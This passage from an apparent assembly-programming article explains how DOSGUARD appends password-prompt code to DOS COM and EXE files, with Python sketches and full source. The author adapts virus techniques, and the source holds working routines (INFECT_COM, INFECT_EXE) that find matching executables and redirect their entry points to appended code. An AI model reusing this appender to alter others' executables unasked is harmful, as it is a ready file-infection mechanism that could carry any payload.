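    """True if the entry segment sits exactly guard_len bytes from the end."""
    entry_in_image = init_cs * 16        # entry point inside the load image
    header_bytes = header_paras * 16     # header is not part of the image
    return entry_in_image + guard_len + header_bytes == file_size
```

Take a 512 byte header (32 paragraphs), a host that ends at file offset
1200h and 600 bytes of added code: the new cs is 120h - 20h = 100h, the
file is 5208 bytes long, and 4096 + 600 + 512 is 5208 as well.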


EXE MODIFICATION - STEP 5
-------------------------
Another simple test that needs to be done is to make sure that the Overlay
Number stored in the EXE header is 0.  The code for this is simple.

         ;Make sure Overlay Number is 0
         cmp     word ptr [exehead+26], 0
         jnz     NO_INFECT


EXE MODIFICATION - STEP 6
-------------------------
This part is kind of tricky.  There are lots of files out there with the EXE
extension that aren't DOS executables.  Both Windows and OS/2 use this
extension as well, for instance.  To complicate matters, there isn't an easy
way to automatically distinguish DOS EXEs from the others.  The technique
that I use in DOSGUARD is to check the offset of the relocation pointer
table and make sure that it is less than 40h.  This should always detect
Windows and OS/2 programs, but it sometimes raises false alarms on valid DOS
files.

         ;Make sure it is a DOS EXE (as opposed to windows or OS/2)
         cmp     word ptr [exehead+24], 40h
         jae     NO_INFECT


EXE MODIFICATION - STEP 7
-------------------------
Now that we know we have a file that we can modify we just have to determine
if it's going to be easy to modify or a real pain.  Here's the deal.  The
header, relocation pointer table included, is always a multiple of 16 bytes
in size.  Each pointer in the table is 4 bytes.  For our purposes, we need
to add 2 pointers to the table.  That means the table must have at least 8
bytes free in order to leave it at its current size.  If it doesn't have
room for two more pointers, then we will have to make room.  That means
reading in the whole file after the table and writing it back out with 16
bytes more space for the table.

To find out if there is enough room, all you have to do is subtract the
offset of the relocation pointer table and the number of entries in the
table from the size of the header.  The result is the amount of free space
in the table.  All of this information can be found in the handy dandy EXE
header.  Of course, you have to take into account the units that each of
these values are stored in (bytes, paragraphs, etc.)

         ;Check the relocation pointer table to see if there is
         ;room.  If there isn't then we'll have to make room.
         mov     ax, word ptr [exehead+8];size of header in paragraphs
         add     ax, ax                  ;
         add     ax, ax                  ;Convert to double words.
         sub     ax, word ptr [exehead+6];Subtract # of entries each of
         add     ax, ax                  ;which is a double word and then
         add     ax, ax                  ;convert the final total to bytes.
         sub     ax, word ptr [exehead+24];If there are 8 bytes left after
         cmp     ax, 8                    ;you subtract the offset to the
         jc      NOROOM                   ;reloc table then there is room.
         jmp     HAVEROOM
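
Worked in plain bytes, the check above looks like this.  It is a Python
sketch with hypothetical function names; the three arguments are the
header fields at offsets 8, 6 and 24.

```python
def reloc_free_bytes(header_paras: int, reloc_count: int,
                     reloc_offset: int) -> int:
    """Unused bytes between the last relocation entry and the program body."""
    header_bytes = header_paras * 16    # paragraphs -> bytes
    table_bytes = reloc_count * 4       # each entry is a double word
    return header_bytes - reloc_offset - table_bytes

def has_room_for_two(header_paras: int, reloc_count: int,
                     reloc_offset: int) -> bool:
    """True if two more 4 byte pointers fit without growing the header."""
    return reloc_free_bytes(header_paras, reloc_count, reloc_offset) >= 8
```

A 512 byte header with its table at 1Ch holds 121 entries at most, so a
file with 119 entries has room and one with 120 does not.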


EXE MODIFICATION - STEP 8
-------------------------
The first thing to do is move the file pointer to the correct spot just
after the last entry in the relocation pointer table.

         xor     cx, cx                  ;Move the file pointer to the end of
         mov     dx, word ptr [exehead+24]  ;the relocation pointer table.
         mov     ax, word ptr [exehead+6];size of relocation table in doubles
         add     ax, ax                  ;* 4 to get bytes
         add     ax, ax
         add     dx, ax                  ;add that to start of table
         push    dx
         mov     ax, 4200h
         int     21h

Now, DOSGUARD calculates the amount which needs to be written.  This code is
in the function called CALC_SIZE.  When CALC_SIZE is finished, cx will hold
the number of pages and "lps" will hold the size of the last page since it
probably will not be a full 512 byte page.

         ;dx holds the position in the file where we want to start reading.
         ;So, the amount to read in and write back out is equal to the size
         ;of the file minus dx.
         mov     cx, word ptr [exehead+2]
         mov     word ptr [lps], cx      ;Copy Last Page Size into lps
         mov     cx, word ptr [exehead+4];Copy Num Pages into cx
         cmp     dx, word ptr [lps]      ;If bytes to subtract are less than
         jbe     FINDLPS                 ;lps then just subtract them, exit
         mov     ax, dx
         xor     dx, dx
         mov     cx, 512
         div     cx                      ;ax = pages to subtract
         mov     cx, word ptr [exehead+4];dx = remainder to subtract from lps
         sub     cx, ax
         cmp     dx, word ptr [lps]
         jbe     FINDLPS
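         sub     cx, 1                   ;remainder > lps: borrow one page
         mov     ax, dx
         sub     ax, word ptr [lps]
         mov     dx, 512
         sub     dx, ax                  ;dx = 512 - (remainder - lps)
         mov     word ptr [lps], dx      ;which is the new last page size
         xor     dx, dx                  ;so FINDLPS has nothing to subtract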

         FINDLPS:
         sub     word ptr [lps], dx      ;Subtract start position and leave
                                         ;Num Pages the same
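
The borrow logic is easier to follow in a high level language.  This is a
minimal Python sketch of the intended result, not a transcription of
CALC_SIZE; it assumes the Last Page Size field is non-zero (a partial last
page), and the function name is invented.

```python
def calc_move_size(page_count: int, last_page_size: int, start: int):
    """Express (file size - start) as (pages, bytes on the last page)."""
    pages_to_drop, remainder = divmod(start, 512)
    pages = page_count - pages_to_drop
    if remainder <= last_page_size:
        # The leftover bytes fit inside the last page: just shrink it.
        return pages, last_page_size - remainder
    # Otherwise borrow a whole page and take the leftover from that.
    return pages - 1, last_page_size + 512 - remainder
```

With 5 pages and 100 bytes on the last one (2148 bytes in all), a start
position of 700 leaves 3 pages with 424 bytes on the last, which is 1448
bytes.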

Once you know the amount of code you have to move, you have to come up with
a way to simultaneously read and write from the same file without
overwriting data that hasn't been read yet.  DOSGUARD's solution is to use
a 16 byte look-ahead buffer.  The move loop keeps 528 bytes in memory (a
512 byte page plus one paragraph) and writes out 512 bytes with each
iteration.  In other words, it reads 16 bytes ahead of where it is writing
so that it doesn't overwrite bytes before they're read.  DOSGUARD has a
number of functions for reading and writing pages, reading and writing
paragraphs, and moving the file pointer around.  It also has one function
for moving the 16 bytes at the end of the 528 byte buffer in memory to the
front.  Well, I'll shut up now and show you the code for the move loop.

         mov     dx, offset buffer
         call    READ_PAGE
         mov     dx, offset para
         call    READ_PARA
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         je      LASTPAGE

         MOVELOOP:
         mov     dx, offset buffer + 16
         call    READ_PAGE
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         jne     MOVELOOP

When DOSGUARD gets to the last page, it finishes things off by reading the
last fraction of a page and then writing out those bytes plus the 16 bytes
that were left buffered from the last iteration of the move loop.

         LASTPAGE:
         sub     word ptr [lps], 16
         mov     cx, word ptr [lps]
         mov     dx, offset buffer + 16
         mov     ah, 3Fh
         int     21h
         push    cx
         mov     dx, cx
         neg     dx
         mov     cx, -1
         mov     ax, 4201h
         int     21h
         pop     cx
         add     cx, 16
         mov     dx, offset buffer
         mov     ah, 40h
         int     21h
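
If you want to play with the read-ahead idea without risking a real EXE,
here is a Python sketch that does the same kind of in-place shift on any
seekable file object.  It follows the idea of the move loop rather than
DOSGUARD's exact routines, and every name in it is an assumption.

```python
import io

PAGE = 512   # bytes per page
PARA = 16    # bytes per paragraph

def shift_tail_by_paragraph(f, start: int) -> None:
    """Move every byte from `start` to end of file 16 bytes higher, in place."""
    f.seek(start)
    pending = f.read(PARA)            # the look-ahead paragraph
    read_pos = start + len(pending)   # next unread byte
    write_pos = start + PARA          # where the moved data begins
    while pending:
        f.seek(read_pos)
        chunk = f.read(PAGE)
        read_pos += len(chunk)
        buf = pending + chunk
        # A full page was read: write 512 bytes and keep 16 in reserve.
        # A short (or empty) read means end of file: flush everything.
        out = buf[:PAGE] if len(chunk) == PAGE else buf
        f.seek(write_pos)
        f.write(out)
        write_pos += len(out)
        pending = buf[len(out):]
```

Each write only covers bytes that have already been read, which is the
whole point of staying one paragraph ahead.  The 16 bytes at `start` keep
their old contents and become the new free space.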

Last, but not least, there is a little maintenance to do.

         ;Got to adjust the file size since it will be used later
         add     word ptr cs:[9Ah], 16
         adc     word ptr cs:[9Ch], 0

         ;Increment the header size within the EXE header
         add     word ptr cs:[exehead+8], 1

         ;Change Page Count and Last Page Size in EXE header
         cmp     word ptr [exehead+2], 496
         jae     ADDPAGE
         add     word ptr [exehead+2], 16
         jmp     HAVEROOM

Oh yeah, there is one more condition that needs to be handled here.  If the
last page was almost full (496 or more bytes), then adding 16 bytes to the
file size will overflow that page so you have to add a whole new page.

         ADDPAGE:
         ;Adjust the header to add a page if the 16 additional bytes run
         ;over to a new page.
         inc     word ptr [exehead+4]
         mov     ax, 512
         sub     ax, word ptr [exehead+2]
         mov     dx, 16
         sub     dx, ax
         mov     word ptr [exehead+2], dx
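
One way to double check the page bookkeeping is to go through the total
byte count.  The Python sketch below does that instead of following the
assembly branch by branch, and it assumes the usual MZ convention that a
Last Page Size of 0 means the last page is completely full, so the two may
disagree in those corner cases.  All three function names are made up.

```python
def file_size_from_fields(page_count: int, last_page_size: int) -> int:
    """Total bytes described by the Page Count / Last Page Size pair."""
    if last_page_size == 0:               # 0 means a full last page
        return page_count * 512
    return (page_count - 1) * 512 + last_page_size

def fields_from_file_size(size: int):
    """Inverse of file_size_from_fields."""
    pages, last = divmod(size, 512)
    return (pages + 1, last) if last else (pages, 0)

def grow_by_paragraph(page_count: int, last_page_size: int):
    """Header fields after 16 bytes have been added to the file."""
    size = file_size_from_fields(page_count, last_page_size)
    return fields_from_file_size(size + 16)
```

For example, 5 pages with 500 bytes on the last one become 6 pages with 4
bytes on the last one.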


EXE MODIFICATION - STEP 9
-------------------------
Whew!  Step 8 was a doozy, but now we're almost done.  All Step 9 requires
of us is to save the original ss:sp and cs:ip values from our victim.
DOSGUARD saves these values in the order that they are found within the EXE
header.

         mov     ax, word ptr [exehead+14] ;save orig stack segment
         mov     [hosts], ax
         mov     ax, word ptr [exehead+16] ;save orig stack pointer
         mov     [hosts+2], ax
         mov     ax, word ptr [exehead+20] ;save orig ip
         mov     [hostc], ax
         mov     ax, word ptr [exehead+22] ;save orig cs
         mov     [hostc+2], ax


EXE MODIFICATION - STEP 10
--------------------------
It will make things a little easier later on if the end of the file we are
about to modify lies on a paragraph boundary.  This way the starting ip for
the new code that we're adding will always be zero.

         ;adjust file length to paragraph boundary
         mov     cx, word ptr cs:[9Ch]
         mov     dx, word ptr cs:[9Ah]
         or      dl, 0Fh
         add     dx, 1
         adc     cx, 0
         mov     cs:[9Ch], cx
         mov     cs:[9Ah], dx
         mov     ax, 4200h               ;move file pointer to end of file
         int     21h                     ;plus boundary
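
The "or dl, 0Fh / add dx, 1" pair is a compact round-up.  In Python terms
(the function name is hypothetical):

```python
def next_paragraph_boundary(size: int) -> int:
    """Round a file size up the way 'or dl,0Fh / add dx,1 / adc cx,0' does."""
    # Setting the low four bits and adding one always lands on the next
    # multiple of 16; Python integers take care of the carry that
    # "adc cx, 0" handles in the high word.
    return (size | 0x0F) + 1
```

Note that a size which is already a multiple of 16 still grows by a full
paragraph: 1240h becomes 1250h.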


EXE MODIFICATION - STEP 11
--------------------------
Finally, we can write our code to the file.  Just like with the COM file, we
will write our code to the end of the file.  The difference is in how we get
there when it's time to execute it.  With COM files we used a jump.  With EXE
files we adjust the starting cs:ip to point to our code.

         mov     cx, offset ENDGUARD2 - offset EXEGUARD  ;write code to end
         mov     dx, offset EXEGUARD                     ;of the exe file
         mov     ah, 40h
         int     21h


EXE MODIFICATION - STEP 12
--------------------------
With our code neatly tucked after the host program's code, it's time to
modify the EXE header so that our code is the first to execute.  We also
have to adjust the size fields in the EXE header to take into account all
the code we just added.

The first thing to do is figure out what the starting segment values need
to be.  The starting cs will simply be the original file size (after the
padding from Step 10) divided by 16 minus the header size in paragraphs.
The initial ip will be 0 because of Step 10.  In DOSGUARD's case the ss
will be the same as the cs and the sp will point to an address 256 bytes
after the end of our code.  256 bytes is plenty of room for DOSGUARD's
stack.

         mov     ax, word ptr cs:[9Ah]   ;calculate module's CS
         mov     dx, word ptr cs:[9Ch]   ;dx:ax contains orig file size
         mov     cx, 16                  ;CS = file size / 16 - header size
         div     cx
         sub     ax, word ptr [exehead+8];header size in paragraphs
         mov     word ptr [exehead+22], ax ;ax is now initial cs
         mov     word ptr [exehead+14], ax ;ax is now initial ss
         mov     word ptr [exehead+20], 0  ;initial ip
         ;initial sp
         mov     word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h

This next bit of code calculates the new file size, in pages of course, and
bumps the relocation entry count by 2 for the pointers added in Step 14.

         ;calculate new file size
         mov     dx, word ptr cs:[9Ch]
         mov     ax, word ptr cs:[9Ah]
         add     ax, offset ENDGUARD2 - offset EXEGUARD + 200h
         adc     dx, 0
         mov     cx, 200h
         div     cx
         mov     word ptr [exehead+4], ax
         mov     word ptr [exehead+2], dx
         add     word ptr [exehead+6], 2
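
Here are the Step 12 numbers redone in Python so they can be checked by
hand.  aligned_size is the file size after Step 10 and guard_len stands in
for ENDGUARD2 - EXEGUARD; both names, like the functions, are assumptions
made for this sketch.

```python
def new_entry_fields(aligned_size: int, header_paras: int, guard_len: int):
    """Initial cs, ss, ip and sp for the appended module."""
    cs = aligned_size // 16 - header_paras   # segment of the appended code
    return {"cs": cs, "ss": cs, "ip": 0, "sp": guard_len + 0x100}

def new_page_fields(aligned_size: int, guard_len: int):
    """Page Count and Last Page Size, computed the way the snippet does."""
    # Adding 200h before dividing rounds the page count up by one, which
    # is what the header wants when the last page is only partly used.
    return divmod(aligned_size + guard_len + 0x200, 0x200)
```

With a host padded to 1200h bytes, a 32 paragraph header and 600 bytes of
added code, cs and ss come out as 100h, sp as 856, and the header says 11
pages with 88 bytes on the last one (10 * 512 + 88 = 5208 bytes).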


EXE MODIFICATION - STEP 13
--------------------------
Now, we should be through with the header so we can write it back out to the
file.

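         ;Write out the new header
         xor     cx, cx                  ;The header lives at the start of
         xor     dx, dx                  ;the file, so seek there first
         mov     ax, 4200h
         int     21h
         mov     cx, 1Ch
         mov     dx, offset exehead
         mov     ah, 40h
         int     21h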


EXE MODIFICATION - STEP 14
--------------------------
Last, but not least, we have to modify the relocation pointer table.  First,
we need to move the file pointer to where we need to add the new entries.

         mov     ax, word ptr [exehead+6];Get the # of relocatables
         dec     ax                      ;Position to add relocatable equals
         dec     ax                      ;(# - 2)*4 + table offset
         mov     cx, 4
         mul     cx
         add     ax, word ptr [exehead+24]
         adc     dx, 0
         mov     cx, dx
         mov     dx, ax
         mov     ax, 4200h               ;move file pointer to position
         int     21h

Now, we have to add two pointers to the table.  The first points to "hosts,"
which is the stack segment of the original program.  The second points to
"hostc+2," which holds the original program's code segment.

         ;Use exehead as a buffer for relocatables.
         ;Put two pointers in this buffer, first points to ss in
         ;hosts and second points to cs in hostc.
         mov     word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
         mov     ax, word ptr [exehead+22]
         mov     word ptr [exehead+2], ax
         mov     word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
         mov     word ptr [exehead+6], ax
         mov     cx, 8
         mov     dx, offset exehead
         mov     ah, 40h                 ;Write the 8 bytes.
         int     21h
         mov     ah, 3Eh                 ;Close the file.
         int     21h
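
To make the table entries concrete, here is a Python sketch of the 8 bytes
being written and of what DOS later does with them.  guard_len again
stands for ENDGUARD2 - EXEGUARD, guard_seg for the new initial cs, and all
three function names are invented for the example.

```python
import struct

def new_reloc_entries(guard_len: int, guard_seg: int) -> bytes:
    """The two 4 byte pointers (offset word first, then segment word)."""
    first = struct.pack("<HH", guard_len - 10, guard_seg)   # -> hosts
    second = struct.pack("<HH", guard_len - 4, guard_seg)   # -> hostc+2
    return first + second

def reloc_write_position(new_reloc_count: int, reloc_offset: int) -> int:
    """File offset of the first new entry: (# - 2) * 4 + table offset."""
    return (new_reloc_count - 2) * 4 + reloc_offset

def apply_relocation(stored_segment: int, load_segment: int) -> int:
    """What the loader does to each word a table entry points at."""
    return (stored_segment + load_segment) & 0xFFFF
```

Because of these two pointers, the saved ss and cs of the host get the
load segment added to them at load time, just like any other segment
reference in the program.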


RESPONSIBILITIES OF INSERTED CODE
---------------------------------
There are several items which the code module we added must take into
consideration.  First of all, when it is finished, the state of registers,
etc. must be exactly what the original program would expect them to be.
For instance, ax is set by DOS to indicate whether or not the Drive ID
stored in the FCBs is valid.  So, the value of ax must be preserved by our
code.  Also, the original program may expect other registers to be set to
initial values of zero.  And of course, the segment registers need to be
restored after our code's execution.

In order to actually restore control to the host, our code must restore ss
and sp to their original values.  Then, it jumps to the original cs:ip.

Also, inserted code can't be dependent on absolute addresses for its data.
Therefore, DOSGUARD accesses all data by its offset from the end of the
file.


CONCLUSION
----------
Hopefully, I've explained the techniques I used in developing DOSGUARD well
enough for you to develop your own binary modifying programs.  As I
mentioned at the beginning of this article, DOSGUARD has a lot of room for
improvement.  If you are interested then you should check out my web page
and download the source for ENCGUARD, a more secure version of DOSGUARD.  A
nice way to extend DOSGUARD would be to improve on the encryption
techniques used in ENCGUARD.  If I ever find the time I would like to write
a Win32 version of DOSGUARD which could safely modify the PE file format.
If I ever do embark on such a task, I'll be sure to let the readers of
Assembly Programming Journal know about it.


REFERENCES
----------
"The Giant Black Book of Computer Viruses, 2nd edition" by Mark Ludwig


CONTACT INFORMATION
-------------------
email:  jjsimpso@...
web page: http://www4.ncsu.edu/~jjsimpso/index.html

Check out my web page for more information on my research into code
modification.  Also, feel free to email me with ideas, corrections,
improvements, etc.


---------------------------BEGIN DOSGUARD.ASM----------------------------------
.model tiny
.code

         ORG     100h

START:
         jmp     BEGINCODE               ;Jump the identification string
         DB      'CG'

BEGINCODE:

         mov     dx, offset filter1
         call    FIND_FILES
         mov     dx, offset filter2
         call    FIND_FILES

         mov     ax, 4C00h               ;DOS terminate
         int     21h

;-------------------------------------------------------------------------
;Procedure to find and then infect files
;-------------------------------------------------------------------------
FIND_FILES:

         mov     ah, 4Eh                 ;Search for files matching filter
         int     21h

SLOOP:
         jc      DONE
         mov     ax, 3D02h               ;Open file R/W
         mov     dx, 9Eh                 ;Filename, stored in DTA
         int     21h
         mov     bx, ax                  ;Save file handle in bx
         mov     ax, 3F00h               ;Read first 5 bytes from file
         mov     cx, 5
         mov     dx, offset obytes
         int     21h

         ;Check to see if file is really an EXE
         cmp     word ptr[obytes], 'ZM'
         je      EXE

COM:
         ;Check to see if file is already infected
         ;if it is, then skip it
         cmp     word ptr [obytes + 3], 'GC'
         je      NO_INFECT


         ;Make sure file isn't too large
         mov     ax, ds:[009Ah]          ;Size of file
         add     ax, offset ENDGUARD - offset COMGUARD + 100h
         jc      NO_INFECT               ;If ax overflows then don't infect

         ;If we made it this far then we know the file is safe to modify
         call    INFECT_COM
         jmp     NO_INFECT

EXE:
         ;Read the EXE Header
         call    READ_HEADER
         jc      NO_INFECT               ;error reading file so skip it

         ;Make sure it hasn't already been infected
         ;If (initial CS * 16) + (size of EXEGUARD) + (size of header)
         ;  == size then the file has already been infected
         mov     ax, word ptr [exehead+22]
         mov     dx, 16
         mul     dx
         add     ax, offset ENDGUARD2 - offset EXEGUARD
         adc     dx, 0
         mov     cx, word ptr [exehead+8]
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     cx, cx
         add     ax, cx
         adc     dx, 0
         cmp     ax, word ptr cs:[9Ah]
         jne     EXEOK
         cmp     dx, word ptr cs:[9Ch]
         je      NO_INFECT

EXEOK:
         ;Make sure Overlay Number is 0
         cmp     word ptr [exehead+26], 0
         jnz     NO_INFECT

         ;Make sure it is a DOS EXE (as opposed to Windows or OS/2)
         cmp     word ptr [exehead+24], 40h
         jae     NO_INFECT

         call    INFECT_EXE

NO_INFECT:
         mov     ax, 4F00h               ;Find next file
         int     21h
         jmp     SLOOP

DONE:

         ret


;-------------------------------------------------------------------------
;Procedure to infect COM files
;-------------------------------------------------------------------------
INFECT_COM:
         xor     cx, cx                  ;cx = 0
         xor     dx, dx                  ;dx = 0
         mov     ax, 4202h               ;Move file pointer to end of file
         int     21h

         mov     ax, 4000h               ;Write the code to the end of file
         mov     dx, offset COMGUARD
         mov     cx, offset ENDGUARD - offset COMGUARD
         int     21h

         mov     ax, 4200h               ;Move file pointer to beginning of
         xor     cx, cx                  ; file to write jump
         xor     dx, dx
         int     21h

         ;Prepare the jump instruction to be written to beginning of file
         xor     ax, ax
         mov     byte ptr [bytes], 0E9h  ;opcode for jmp
         mov     ax, ds:[009Ah]          ;size of the file
         sub     ax, 3                   ;size of the jump instruction
         mov     word ptr [bytes + 1], ax;size of the jump

         ;Write the jump
         mov     cx, 5;                  ;size to be written
         mov     dx, offset bytes
         mov     ax, 4000h
         int     21h

         mov     ah, 3Eh                 ;Close file
         int     21h

         ret


;-------------------------------------------------------------------------
;Procedure to infect EXE files
;-------------------------------------------------------------------------
INFECT_EXE:

         ;Check the relocation pointer table to see if there is
         ;room.  If there isn't then we'll have to make room.
         mov     ax, word ptr [exehead+8];size of header in paragraphs
         add     ax, ax                  ;
         add     ax, ax                  ;Convert to double words.
         sub     ax, word ptr [exehead+6];Subtract # of entries each of
         add     ax, ax                  ;which is a double word and then
         add     ax, ax                  ;convert the final total to bytes.
         sub     ax, word ptr [exehead+24];If there are 8 bytes left after
         cmp     ax, 8                    ;you subtract the offset to the
         jc      NOROOM                   ;reloc table then there is room.
         jmp     HAVEROOM

NOROOM:
         ;Not enough room in the relocation table so we are going to
         ;have to add a paragraph to the table.  As a result, we must
         ;read in the whole file after the relocation table and write
         ;it back out one paragraph down in memory.
         xor     cx, cx                  ;Move the file pointer to the end of
         mov     dx, word ptr [exehead+24]  ;the relocation pointer table.
         mov     ax, word ptr [exehead+6];size of relocation table in doubles
         add     ax, ax                  ;* 4 to get bytes
         add     ax, ax
         add     dx, ax                  ;add that to start of table
         push    dx
         mov     ax, 4200h
         int     21h

         pop     dx
         call    CALC_SIZE
         cmp     cx, 1
         je      LASTPAGE

         mov     dx, offset buffer
         call    READ_PAGE
         mov     dx, offset para
         call    READ_PARA
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         je      LASTPAGE

MOVELOOP:
         mov     dx, offset buffer + 16
         call    READ_PAGE
         call    DECFP_PAGE
         call    WRITE_PAGE
         call    MOVE_PARA
         dec     cx
         cmp     cx, 1
         jne     MOVELOOP

LASTPAGE:
         sub     word ptr [lps], 16
         mov     cx, word ptr [lps]
         mov     dx, offset buffer + 16
         mov     ah, 3Fh
         int     21h
         push    cx
         mov     dx, cx
         neg     dx
         mov     cx, -1
         mov     ax, 4201h
         int     21h
         pop     cx
         add     cx, 16
         mov     dx, offset buffer
         mov     ah, 40h
         int     21h

         ;Got to adjust the file size since it will be used later
         add     word ptr cs:[9Ah], 16
         adc     word ptr cs:[9Ch], 0

         ;Increment the header size within the EXE header
         add     word ptr cs:[exehead+8], 1

         ;Change Page Count and Last Page Size in EXE header
         cmp     word ptr [exehead+2], 496
         jae     ADDPAGE
         add     word ptr [exehead+2], 16
         jmp     HAVEROOM

ADDPAGE:
         ;Adjust the header to add a page if the 16 additional bytes run
         ;over to a new page.
         inc     word ptr [exehead+4]
         mov     ax, 512
         sub     ax, word ptr [exehead+2]
         mov     dx, 16
         sub     dx, ax
         mov     word ptr [exehead+2], dx

HAVEROOM:
         mov     ax, word ptr [exehead+14] ;save orig stack segment
         mov     [hosts], ax
         mov     ax, word ptr [exehead+16] ;save orig stack pointer
         mov     [hosts+2], ax
         mov     ax, word ptr [exehead+20] ;save orig ip
         mov     [hostc], ax
         mov     ax, word ptr [exehead+22] ;save orig cs
         mov     [hostc+2], ax

         mov     cx, word ptr cs:[9Ch]   ;adjust file length to paragraph
         mov     dx, word ptr cs:[9Ah]   ;  boundary
         or      dl, 0Fh
         add     dx, 1
         adc     cx, 0
         mov     cs:[9Ch], cx
         mov     cs:[9Ah], dx
         mov     ax, 4200h               ;move file pointer to end of file
         int     21h                     ;plus boundary

         mov     cx, offset ENDGUARD2 - offset EXEGUARD  ;write code to end
         mov     dx, offset EXEGUARD                     ;of the exe file
         mov     ah, 40h
         int     21h

         xor     cx, cx                  ;Move file pointer to start of file
         xor     dx, dx
         mov     ax, 4200h
         int     21h

         ;adjust the EXE header and then write it back out
         mov     ax, word ptr cs:[9Ah]   ;calculate module's CS
         mov     dx, word ptr cs:[9Ch]      ;dx:ax contains orig file size
         mov     cx, 16                  ;CS = file size / 16 - header size
         div     cx
         sub     ax, word ptr [exehead+8];header size in paragraphs
         mov     word ptr [exehead+22], ax ;ax is now initial cs
         mov     word ptr [exehead+14], ax ;ax is now initial ss
         mov     word ptr [exehead+20], 0  ;initial ip
         mov     word ptr [exehead+16], ENDGUARD2 - EXEGUARD + 100h ;initial sp

         mov     dx, word ptr cs:[9Ch]   ;calculate new size file size
         mov     ax, word ptr cs:[9Ah]
         add     ax, offset ENDGUARD2 - offset EXEGUARD + 200h
         adc     dx, 0
         mov     cx, 200h
         div     cx
         mov     word ptr [exehead+4], ax
         mov     word ptr [exehead+2], dx
         add     word ptr [exehead+6], 2

         mov     cx, 1Ch                 ;Write out the new header
         mov     dx, offset exehead
         mov     ah, 40h
         int     21h

         ;modify relocatables table
         mov     ax, word ptr [exehead+6];Get the # of relocatables
         dec     ax                      ;Position to add relocatable equals
         dec     ax                      ;(# - 2)*4 + table offset
         mov     cx, 4
         mul     cx
         add     ax, word ptr [exehead+24]
         adc     dx, 0
         mov     cx, dx
         mov     dx, ax
         mov     ax, 4200h               ;move file pointer to position
         int     21h

         ;Use exehead as a buffer for relocatables.
         ;Put two pointers in this buffer, first points to ss in
         ;hosts and second points to cs in hostc.
         mov     word ptr [exehead], ENDGUARD2 - EXEGUARD - 10
         mov     ax, word ptr [exehead+22]
         mov     word ptr [exehead+2], ax
         mov     word ptr [exehead+4], ENDGUARD2 - EXEGUARD - 4
         mov     word ptr [exehead+6], ax
         mov     cx, 8
         mov     dx, offset exehead
         mov     ah, 40h                 ;Write the 8 bytes.
         int     21h
         mov     ah, 3Eh                 ;Close the file.
         int     21h

         ret                             ;Done!

;-------------------------------------------------------------------------
;Procedure to calculate the amount that needs to be written
;-------------------------------------------------------------------------
CALC_SIZE:
         ;dx holds the position in the file where we want to start reading.
         ;So, the amount to read in and write back out is equal to the size
         ;of the file minus dx.

         mov     cx, word ptr [exehead+2]
         mov     word ptr [lps], cx      ;Copy Last Page Size into lps
         mov     cx, word ptr [exehead+4];Copy Num Pages into cx

         cmp     dx, word ptr [lps]      ;If bytes to subtract are less than
         jbe     FINDLPS                 ;lps, just subtract them and exit
         mov     ax, dx
         xor     dx, dx
         mov     cx, 512
         div     cx                      ;ax = pages to subtract
         mov     cx, word ptr [exehead+4];dx = remainder to subtract from lps
         sub     cx, ax
         cmp     dx, word ptr [lps]
         jbe     FINDLPS
         sub     cx, 1
         mov     ax, dx
         sub     ax, word ptr [lps]
         mov     dx, 512
         sub     dx, ax

FINDLPS:
         sub     word ptr [lps], dx      ;Subtract start position and leave
                                         ;Num Pages the same

         ret

;-------------------------------------------------------------------------
;Procedure to read the EXE Header
;-------------------------------------------------------------------------
READ_HEADER:
         xor     cx, cx                  ;Move the file pointer back
         xor     dx, dx                  ;to the beginning of the file
         mov     ax, 4200h
         int     21h
         mov     cx, 1Ch                 ;read exe header (28 bytes)
         mov     dx, offset exehead      ;into buffer
         mov     ah, 3Fh
         int     21h

         ret                             ;return with cf set properly

;-------------------------------------------------------------------------
;Procedure to read a page
;-------------------------------------------------------------------------
READ_PAGE:
         push    ax
         push    cx

         mov     ah, 3Fh
         mov     cx, 512
         int     21h

         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to read a paragraph
;-------------------------------------------------------------------------
READ_PARA:
         push    ax
         push    cx

         mov     ah, 3Fh
         mov     cx, 16
         int     21h

         pop     cx
         pop     ax


         ret

;-------------------------------------------------------------------------
;Procedure to write a page
;-------------------------------------------------------------------------
WRITE_PAGE:
         push    ax
         push    cx
         push    dx

         mov     ah, 40h
         mov     cx, 512
         mov     dx, offset buffer
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to write a paragraph
;-------------------------------------------------------------------------
WRITE_PARA:
         push    ax
         push    cx
         push    dx

         mov     ah, 40h
         mov     cx, 16
         mov     dx, offset buffer
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to move file pointer back a page
;-------------------------------------------------------------------------
DECFP_PAGE:
         push    ax
         push    cx
         push    dx

         mov     ax, 4201h
         mov     cx, -1
         mov     dx, -512
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to move file pointer back a para
;-------------------------------------------------------------------------
DEC_PARA:
         push    ax
         push    cx
         push    dx

         mov     ax, 4201h
         mov     cx, -1
         mov     dx, -16
         int     21h

         pop     dx
         pop     cx
         pop     ax

         ret

;-------------------------------------------------------------------------
;Procedure to move the paragraph buffer to the front
;-------------------------------------------------------------------------
MOVE_PARA:
         push    cx

         mov     si, offset para
         mov     di, offset buffer
         mov     cx, 16
         rep     movsb

         pop     cx

         ret



;-------------------------------------------------------------------------
;Code to add to COM files
;-------------------------------------------------------------------------
COMGUARD:
         call    GET_START

GET_START:
         pop     bp
         sub     bp, offset GET_START

         mov     ah, 9h                  ;DOS print string
         lea     dx, [bp + prompt]       ;Print the password prompt
         int     21h
         lea     di, [bp + guess]
         xor     cx, cx

READLOOP:
         mov     ah, 7h                  ;Read without echo
         int     21h
         inc     cx                      ;Count of characters entered
         stosb                           ;Store guess for comparison later
         cmp     cx, 10                  ;Limit guess to 10 chars incl. CR
         je      CHECKPASS
         cmp     al, 13                  ;Quit loop when CR read
         jne     READLOOP

CHECKPASS:
         lea     di, [bp + guess]        ;Setup for passwd checking loop
         lea     si, [bp +passwd]        ;Setup addresses for cmpsb
